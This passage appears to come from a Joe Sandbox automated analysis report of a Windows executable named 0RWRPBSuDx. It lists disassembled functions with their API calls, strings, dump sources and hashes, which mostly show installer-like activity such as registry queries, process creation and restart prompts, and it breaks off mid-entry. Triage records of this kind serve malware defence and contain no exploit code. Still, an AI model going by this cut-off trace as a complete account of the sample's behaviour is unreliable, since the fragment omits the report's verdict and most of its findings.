                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDeleteHandleModuleProc
                                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                                          • API String ID: 588496660-1846899949
                                                                          • Opcode ID: 4c361a7a43e5834a8a8afc63cfbcc85a9ce817fb11b6eda3160fbad0bd781d86
                                                                          • Instruction ID: 9ef85b4990a5f4fb77651896212c2f73edba4f4f6701b5dd75972328515d435d
                                                                          • Opcode Fuzzy Hash: 4c361a7a43e5834a8a8afc63cfbcc85a9ce817fb11b6eda3160fbad0bd781d86
                                                                          • Instruction Fuzzy Hash: 07E06DF0B45230AAD62067ABBD4AFA327289BA5725F544037B105A619182FC4C41DE5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetActiveWindow.USER32(?,?,00000000,0047D751,?,?,00000001,?), ref: 0047D54D
                                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0047D5C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveChangeNotifyWindow
                                                                          • String ID: $Need to restart Windows? %s
                                                                          • API String ID: 1160245247-4200181552
                                                                          • Opcode ID: d32a6059a512e9bf963a78dfa1268871c9947cd75c38b82ea2162a998853572e
                                                                          • Instruction ID: a8c1ceac0135a07eac7a41659c63538f6f32d9d948fb070117fc44b1a1a01c6f
                                                                          • Opcode Fuzzy Hash: d32a6059a512e9bf963a78dfa1268871c9947cd75c38b82ea2162a998853572e
                                                                          • Instruction Fuzzy Hash: 0E91A074A006449FCB01EF69E885B9E77F4AF49308F1080BBE4049B362D738A945CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                          • GetLastError.KERNEL32(00000000,0046B5BD,?,?,00000001,004950AC), ref: 0046B49A
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046B514
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046B539
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                          • String ID: Creating directory: %s
                                                                          • API String ID: 2451617938-483064649
                                                                          • Opcode ID: d0889181267df992a591f3ea40977f34f7a5259987c22db0f3b4d7debd1e95ef
                                                                          • Instruction ID: 5f4869df34387351d22434cdd0714d3fe117de94cd68d5563c6cbe2666c0fa91
                                                                          • Opcode Fuzzy Hash: d0889181267df992a591f3ea40977f34f7a5259987c22db0f3b4d7debd1e95ef
                                                                          • Instruction Fuzzy Hash: DD514174E00248ABDB01DFA5C482BDEB7F5EF48308F50856AE851B7382DB785E44CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,004541E3,?,00000001,00000000), ref: 004541D6
                                                                          Strings
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454184
                                                                          • PendingFileRenameOperations2, xrefs: 004541B7
                                                                          • PendingFileRenameOperations, xrefs: 004541A8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                          • API String ID: 47109696-2115312317
                                                                          • Opcode ID: f34624fdd3cb7fddb242984fec9a2046b392dbdee4337d793cbee412e8c9c1b2
                                                                          • Instruction ID: 8e02acf7dda17f65ef86d3b585dbeec974d4a4341a7776fb0aa38c58d509200f
                                                                          • Opcode Fuzzy Hash: f34624fdd3cb7fddb242984fec9a2046b392dbdee4337d793cbee412e8c9c1b2
                                                                          • Instruction Fuzzy Hash: 2EF0F635208608BFD704D6E2DC06A1B77ECD7C5759FB14467F9009F582DE78AE94921C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetMenu.USER32(00000000), ref: 004212D1
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004212EE
                                                                          • SetMenu.USER32(00000000,00000000), ref: 00421323
                                                                          • SetMenu.USER32(00000000,00000000), ref: 0042133F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Menu
                                                                          • String ID:
                                                                          • API String ID: 3711407533-0
                                                                          • Opcode ID: 4c00e3b9410a05ce5c81e379d34b9db56685470e430e4bbd06adfeec13cad146
                                                                          • Instruction ID: 48f3a64e559805c9a8555d4ddd453999d2efe8395b615d28906c4a6af38eb170
                                                                          • Opcode Fuzzy Hash: 4c00e3b9410a05ce5c81e379d34b9db56685470e430e4bbd06adfeec13cad146
                                                                          • Instruction Fuzzy Hash: 0141BE307002645BEB20AA7AA88579B37914F65308F4845BFFC44EF3A7CA7CCC4582AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416AF4
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00416B0E
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00416B28
                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416B50
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Color$CallMessageProcSendTextWindow
                                                                          • String ID:
                                                                          • API String ID: 601730667-0
                                                                          • Opcode ID: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                          • Instruction ID: c000e8b01db0500dd6874d208778bcf8efa3d9016d5589f965051e8255cd057a
                                                                          • Opcode Fuzzy Hash: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                          • Instruction Fuzzy Hash: 74115EB2604604AFC710EE6ECC84E8777ECEF49710B15886BB55ADB652C638FC418B79
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnumWindows.USER32(0042398C), ref: 00423A18
                                                                          • GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                          • SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnumLongWindows
                                                                          • String ID:
                                                                          • API String ID: 4191631535-0
                                                                          • Opcode ID: 8ff7365b5520c72616fb03b6a0c4256d91edd785515c56340625f2feabb98e97
                                                                          • Instruction ID: 5fb1b4c26b7281e556a96b269d9e57b3a313a4882f561b886cf0e087050bba11
                                                                          • Opcode Fuzzy Hash: 8ff7365b5520c72616fb03b6a0c4256d91edd785515c56340625f2feabb98e97
                                                                          • Instruction Fuzzy Hash: 45115A70700610ABDB10EF68DC85F5A77E8EB48725F11026AF9A4AB2E2C37CDC41CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                          • EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A24620A480A570EnumFonts
                                                                          • String ID:
                                                                          • API String ID: 2630238358-0
                                                                          • Opcode ID: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                          • Instruction ID: 4d68480f6d607538855b0f171b38ffa839f5ce6e0578d669e72114bdc8101102
                                                                          • Opcode Fuzzy Hash: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                          • Instruction Fuzzy Hash: 0601D2616053002AE700BF6A5C82B9B37649F00709F40027BF804AF2C7D6BE9805476E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                          • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                          • CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                          • String ID:
                                                                          • API String ID: 4071923889-0
                                                                          • Opcode ID: ddcdf6928b028788f19173831482d9f32cfd0fe6233734d9ccef482c6c221cba
                                                                          • Instruction ID: 9fccd2aefca3528e48b7c7924445ec13d0cbcd302fba8438f8af89f39fd4f237
                                                                          • Opcode Fuzzy Hash: ddcdf6928b028788f19173831482d9f32cfd0fe6233734d9ccef482c6c221cba
                                                                          • Instruction Fuzzy Hash: 6001F9F0E006087EEB209BA58C02F6BBA9CDB0D7A1F504567B904D32C2D6785E008668
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GlobalHandle.KERNEL32 ref: 00406287
                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocHandleWire
                                                                          • String ID:
                                                                          • API String ID: 2210401237-0
                                                                          • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                          • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                          • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                          • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0044FE04: SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045A7BD
                                                                          Strings
                                                                          • EndOffset range exceeded, xrefs: 0045A6F1
                                                                          • NumRecs range exceeded, xrefs: 0045A6BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$BuffersFlush
                                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                          • API String ID: 3593489403-659731555
                                                                          • Opcode ID: d10465de438f0d9a20d62f3af6b3d551a4455012a7dd22e12cedccbfc0f573d8
                                                                          • Instruction ID: 2b961db3f5bdd9156690fc13548013475d80f4f35adf24b78551c01bb99683a1
                                                                          • Opcode Fuzzy Hash: d10465de438f0d9a20d62f3af6b3d551a4455012a7dd22e12cedccbfc0f573d8
                                                                          • Instruction Fuzzy Hash: 6B61B634A002948FDB24DF25C880BDAB7B5EF49305F0085EAED889B352D674AEC9CF15
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049293A), ref: 0040334B
  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049293A), ref: 00403356
  • Part of subcall function 00409AE8: 6F571CD0.COMCTL32(00492949), ref: 00409AE8
  • Part of subcall function 004108C4: GetCurrentThreadId.KERNEL32 ref: 00410912
  • Part of subcall function 00418FB0: GetVersion.KERNEL32(0049295D), ref: 00418FB0
  • Part of subcall function 0044EFD8: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00492971), ref: 0044F013
  • Part of subcall function 0044EFD8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F019
  • Part of subcall function 00451B74: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451B94
  • Part of subcall function 00451B74: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451B9A
  • Part of subcall function 00451B74: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451BAE
  • Part of subcall function 00451B74: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451BB4
  • Part of subcall function 00460AF4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
  • Part of subcall function 00460AF4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
  • Part of subcall function 00468898: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 004688AD
  • Part of subcall function 00473B70: GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
  • Part of subcall function 00473B70: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
  • Part of subcall function 00473B70: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
  • Part of subcall function 0048FAC4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0048FADD
• SetErrorMode.KERNEL32(00000001,00000000,004929E1), ref: 004929B3
  • Part of subcall function 0049273C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004929BD,00000001,00000000,004929E1), ref: 00492746
  • Part of subcall function 0049273C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049274C
  • Part of subcall function 00424444: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424463
  • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
• ShowWindow.USER32(?,00000005,00000000,004929E1), ref: 00492A24
  • Part of subcall function 0047CB54: SetActiveWindow.USER32(?), ref: 0047CBF8
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: AddressProc$HandleModule$Window$ActiveClipboardCommandCurrentErrorF571FormatLibraryLineLoadMessageModeRegisterSendShowTextThreadVersion
• String ID: Setup
• API String ID: 4284711697-3839654196
• Opcode ID: 639ba3783921b247417bcefc2a0b3e3d8b803f8c75a70ac499f6ae3d48694326
• Instruction ID: eded0d4357af90f477a459f2b01769dd77d742874e450745c10b4ef5d55a2914
• Opcode Fuzzy Hash: 639ba3783921b247417bcefc2a0b3e3d8b803f8c75a70ac499f6ae3d48694326
• Instruction Fuzzy Hash: C33115722046006FD601BBB7ED5395D3B98EBC9719B62457FF40492A93CE7C5C418A3E
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00452497,?,?,00000000,00494628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004523EE
• GetLastError.KERNEL32(00000000,00000000,?,00000000,00452497,?,?,00000000,00494628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004523F7
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: .tmp
• API String ID: 1375471231-2986845003
• Opcode ID: 4a0e093c0516768d85d3f1ab6189cfbf3f3e2d31e0be1d7e979444a92c8dfe51
• Instruction ID: f2a91aa9b7c92abf08b1cf9804f586f67492acd5f2b8aa702b6c2495f1d600d0
• Opcode Fuzzy Hash: 4a0e093c0516768d85d3f1ab6189cfbf3f3e2d31e0be1d7e979444a92c8dfe51
• Instruction Fuzzy Hash: EF216574A002089BDB01EFA1C9429DFB7B9EF49305F50447BEC01B7342DA7C9E048AA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,00000000,?,?,0aE,00000000,00456118,?,?,?,00000000,004511E6,?,?,?,00000001), ref: 004511C0
• GetLastError.KERNEL32(00000000,00000000,?,?,0aE,00000000,00456118,?,?,?,00000000,004511E6,?,?,?,00000001), ref: 004511C8
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CreateErrorLastProcess
• String ID: 0aE
• API String ID: 2919029540-2709181307
• Opcode ID: e3d63d6d3609c0b896b47cbe3e6c70e55163f3a5d4d5f4b272d250c12acc0d6d
• Instruction ID: ba1904f8ad5b396da002b91a84b6289d0307b3cc7d8e26f05fe7202b1d1cf5f2
• Opcode Fuzzy Hash: e3d63d6d3609c0b896b47cbe3e6c70e55163f3a5d4d5f4b272d250c12acc0d6d
• Instruction Fuzzy Hash: 5F115A72A04608AF8B40CEA9DC81E9B77ECEB4C350B1145A6FE08D3251D634AD14CB64
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047741E,00000000,00477434,?,?,?,?,00000000), ref: 004771FA
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Close
• String ID: RegisteredOrganization$RegisteredOwner
• API String ID: 3535843008-1113070880
• Opcode ID: 85432a3ed76ad868fb852c58816c2db2475bea01b49da00295727814efd58def
• Instruction ID: 251e4fb5afb05e097686391082de11908fc67083b0d73a84a082d7502db0c793
• Opcode Fuzzy Hash: 85432a3ed76ad868fb852c58816c2db2475bea01b49da00295727814efd58def
• Instruction Fuzzy Hash: 26F0BB30708244AFDB11DBA59C52B9B375DD741304FA080BBF104DB382D6799D01C75C
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00470C77), ref: 00470A65
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00470C77), ref: 00470A7C
  • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast
• String ID: CreateFile
• API String ID: 2528220319-823142352
• Opcode ID: 7e28141043a3e0f576738c48cd57d39c8717062d9e0e2e81c58d16874d68a086
• Instruction ID: f059ad179e7cc864c024b880cb83de53b773c1d1f6c265ff80624fd6f5be5d41
• Opcode Fuzzy Hash: 7e28141043a3e0f576738c48cd57d39c8717062d9e0e2e81c58d16874d68a086
• Instruction Fuzzy Hash: 86E06D74351304BBEA10E669CCC6F4A77889B18768F10C152FA59AF3E2C5B9EC40861C
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042E1F0: SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
  • Part of subcall function 0042E1F0: LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
• GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 004688AD
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: AddressErrorLibraryLoadModeProc
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2492108670-2683653824
• Opcode ID: 7d9e8a1c9394b5a8d7c81de7f260a8a70e759d715e8b294ff61618bd829d2d70
• Instruction ID: 6cffaa682af11576deed02c6796eeeee027c815ce59d8c7ab8a1b116f7f65a8a
• Opcode Fuzzy Hash: 7d9e8a1c9394b5a8d7c81de7f260a8a70e759d715e8b294ff61618bd829d2d70
• Instruction Fuzzy Hash: 43B092F0A8071286DA0077B69842B1B2204D7D0708BE0897F7044BB289EE7C84054B9E
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMenu.USER32(00000000,00000000,00000000,0047C340), ref: 0047C2D8
• AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0047C2E9
• AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0047C301
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
